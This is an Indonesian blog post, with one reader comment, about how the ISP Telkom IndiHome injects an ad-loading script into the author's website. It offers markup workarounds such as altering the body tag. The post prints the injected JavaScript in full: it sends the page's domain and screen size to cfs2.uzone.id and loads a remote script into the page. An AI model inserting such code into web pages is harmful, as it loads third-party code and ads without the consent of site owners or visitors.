Thursday, October 27, 2016

Cara Menghilangkan Injeksi Script Telkom Speedy IndiHome

Beberapa hari yang lalu saya diberitahu oleh teman bahwa website yang saya buat sangat lemot dan menampilkan iklan, merespon kejadian tersebut kemudian saya membuka website yang saya buat tadi dan saya tidak menemukan iklan dan akses tidak lemot.

Penasaran dengan hal tersebut kemudian saya masuk ke server website dan melihat beberapa settingan apakah ada kesalahan yang saya buat sehingga menimbulkan masalah itu tadi, ternyata settingan saya tidak ada masalah. Berlanjut lagi, teman saya masih tetap meresakan lemot dan website menampilkan iklan. Akhirnya saya mampir kerumahnya dan dia menunjukkan beberapa keanehan itu. kemudian saya selidiki dengan cara view source lewat browser dan saya menemukan script ini nyempil di website.

<script type="text/javascript">if (self==top) {function netbro_cache_analytics(fn, callback) {setTimeout(function() {fn();callback();}, 0);}function sync(fn) {fn();}function requestCfs(){var idc_glo_url = (location.protocol=="https:" ? "https://" : "http://");var idc_glo_r = Math.floor(Math.random()*99999999999);var url = idc_glo_url+ "cfs2.uzone.id/cfspushadsv2/request" + "?id=1" + "&enc=telkom2" + "&params=" + "4TtHaUQnUEiP6K%2fc5C582H6x5iDAuv2BqqcDrfXeI6p4Aco0mwPmgGk%2bSdfwzHBvX6WdRL1Cc%2fAQiDgZ1j9KVF9k17AslCgbcK5%2b0xijb8F2URrPTOryXpWGY%2bFq3mzRmk2yOEVMQf0tYIB%2fQwAw6oiUcBKam%2fuyKHvkLbKEOjVNxOHcomkQT1QzaBWVDky00x%2fcAq6GoJBX%2feVYHXVsg3EFcGMUSPYLS9kKpicwui%2bwWlZym5b89cCT8Y1q175ZkgJXPCyeRgvf6PJngoDMbNNd6yD%2fNdx5hUTqSJir7MMdcrCOicmg5G%2btssrdt3C%2fsSFBGbKMTdb9WZCLBW63Ukkr71575lc9R6EITVK9QJdWmWWDirhYnO0Gmo%2bS2cq70rIY2X2c%2ft7B8QAACVqP1RQJ7OZ5cqcsZWLIfOz2FhzykKfOVoe82XvUmc2NXwDK62iwqkq4enh2t6V9I3hMOWqVcI51h66Bmk5JcmbjPA4loPemqhwGFc8%2fKPilDSgKqKc3BQwkleqEAa%2bdRgKOr4Vz6CJrLa3wAmHt1yQ2%2fJg%3d" + "&idc_r="+idc_glo_r + "&domain="+document.domain + "&sw="+screen.width+"&sh="+screen.height;var bsa = document.createElement('script');bsa.type = 'text/javascript';bsa.async = true;bsa.src = url;(document.getElementsByTagName('head')[0]||document.getElementsByTagName('body')[0]).appendChild(bsa);}netbro_cache_analytics(requestCfs, function(){});};</script></body>
Penasaran, kemudian saya merubah beberapa syntax <body menjadi <Body dan ternyata website sembuh dan tidak diinjeksi lagi. Selidik punya selidik ternyata script tersebut injeksi dari IndiHome.

Cara Menghilangkan Injeksi Script IndiHome

4 Beri Komentar:

  1. cara diatas ternyata sudah tidak berpengaruh, cara yang saya lakukan hilangkan
    < / body > dan berhasil untuk saat ini

    ReplyDelete